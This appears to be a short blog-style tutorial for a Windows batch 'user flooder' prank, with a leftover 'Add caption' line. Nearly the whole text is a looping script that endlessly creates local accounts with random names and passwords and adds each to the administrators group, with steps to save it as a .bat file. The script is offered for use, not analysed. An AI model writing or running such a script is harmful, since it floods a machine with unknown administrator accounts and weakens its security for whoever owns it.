Add caption |
The ‘user flooder’ program will create a number of user accounts with random numbers, and
assign administrator rights to them by itself, moreover the password set for those user accounts were too random numbers.
1.Open Notepad.
2.Type
@echo off
:usrflood
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrflood
3.Save it as *.bat.